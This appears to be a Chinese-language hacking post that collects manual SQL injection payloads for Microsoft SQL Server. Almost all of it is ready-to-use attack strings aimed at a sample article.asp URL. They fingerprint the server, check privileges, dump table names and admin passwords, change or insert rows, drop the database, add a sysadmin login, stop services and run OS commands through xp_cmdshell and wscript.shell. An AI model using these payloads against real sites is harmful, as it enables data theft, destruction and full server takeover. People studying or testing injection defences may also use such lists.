内容发布更新时间 : 2024/5/22 0:27:25星期一 下面是文章的全部内容请认真阅读。

很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入，以下是收集的一些mssql的sql语句。 手工MSSQL注入常用SQL语句

and exists (select * from sysobjects) //判断是否是MSSQL

and exists(select * from tableName) //判断某表是否存在..tableName为表名

and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@servername) //本地服务名

and 1=(select IS_SRVROLEMEMBER(‘sysadmin’)) //判断是否是系统管理员 and 1=(Select IS_MEMBER(‘db_owner’)) //判断是否是库权限 and 1= (Select HAS_DBACCESS(‘master’)) //判断是否有库读取权限 and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1，2，3….

;declare @d int //是否支持多行

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) //判断XP_CMDSHELL是否存在

and 1=(select count(*) FROM master.dbo.sysobjects where name= ‘xp_regread’) //查看XP_regread扩展存储过程是不是已经被删除 添加和删除一个SA权限的用户test：（需要SA权限） exec master.dbo.sp_addlogin test,password exec master.dbo.sp_addsrvrolemember test,sysadmin 停掉或激活某个服务。 （需要SA权限）

exec master..xp_servicecontrol ‘stop’,’schedule’ exec master..xp_servicecontrol ‘start’,’schedule’ 暴网站目录

create table labeng(lala nvarchar(255), id int)

DECLARE @result varchar(255) EXEC master.dbo.xp_regread ‘HKEY_LOCAL_MACHINE’,’

SYSTEM\\ControlSet001\\Services\\W3SVC\\Parameters\\Virtual Roots’,’/’,@result output insert into labeng(lala) values(@result);

and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)

—————————————————————————————————————————————————————分割 SQL Server 判断是否可注射：

http://www.exehack.net/article.asp?id=6 http://www.exehack.net/article.asp?id=6′ http://www.exehack.net/article.asp?id=6 and 1=1 http://www.exehack.net/article.asp?id=6 and 1=2

http://www.exehack.net/article.asp?action=value’ and 1=1 http://www.exehack.net/article.asp?action=value’ and 1=2 searchpoints%’ and 1=1 searchpoints%’ and 1=2 确定数据库类型：

http://www.exehack.net/article.asp?id=6 and user>0

http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0

查询当前用户数据信息： article.asp?id=6 having 1=1– 暴当前表中的列：

article.asp?id=6 group by admin.username having 1=1–

article.asp?id=6 group by admin.username,admin.password having 1=1– 暴任意表和列：

and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

and (select top col_name(object_id(‘admin’),N) from sysobjects)>1 暴数据库数据：

and (select top 1 password from admin where id=N)>1 修改数据库中的数据：

;update admin set password=’oooooo’ where username=’xxx’ 增添数据库中的数据：

;insert into admin values (xxx,oooooo)– 删数据库：

;drop database webdata

获取当前数据库用户名：and user>0 获取当前数据库名：and db_name()>0 获取数据库版本：and (select @@version)>0 判断是否支持多句查询：;declare @a int–

判断是否支持子查询：and (select count(1) from [sysobjects])>=0 数据库的扩展存储过程：exec master..xp_cmdshell

查看服务器C盘目录：;exec_master..xp_cmdshell ‘dir c:\\’

判断扩展存储过程是否存在：and select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’

恢复扩展存储过程：;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’ 删除扩展存储过程：;exec sp_dropextendedproc ‘xp_cmdshell’ 在MSSQL2000中提供了一些函数用于访问OLE对象间接获取权限： ;declare @s int

;exec sp_oacreat ‘wscript.shell’,@s

;exec master..spoamethod @s,’run’,null,’cmd.exe/c dir c:\\’ 判断当前数据库用户名是否拥有比较高的权限： and 1=(select is_srvrolemember(‘sysadmin’)) and 1=(select is_srvrolemember(‘serveradmin’)) and 1=(select is_srvrolemember(‘setupadmin’)) and 1=(select is_srvrolemember(‘securityadmin’)) and 1=(select is_srvrolemember(‘diskadmin’)) and 1=(select is_srvrolemember(‘bulkadmin’)) 判断当前数据库用户名是否为DB_OWNER： and 1=(select is_member(‘db_owner’))

在SQLSERVER的master.dbo.sysdatabases表中存放着SQLSERVER数据库系统中的所有数据库信息，只需要PUBLIC权限就可以对此表进行SELECT操作：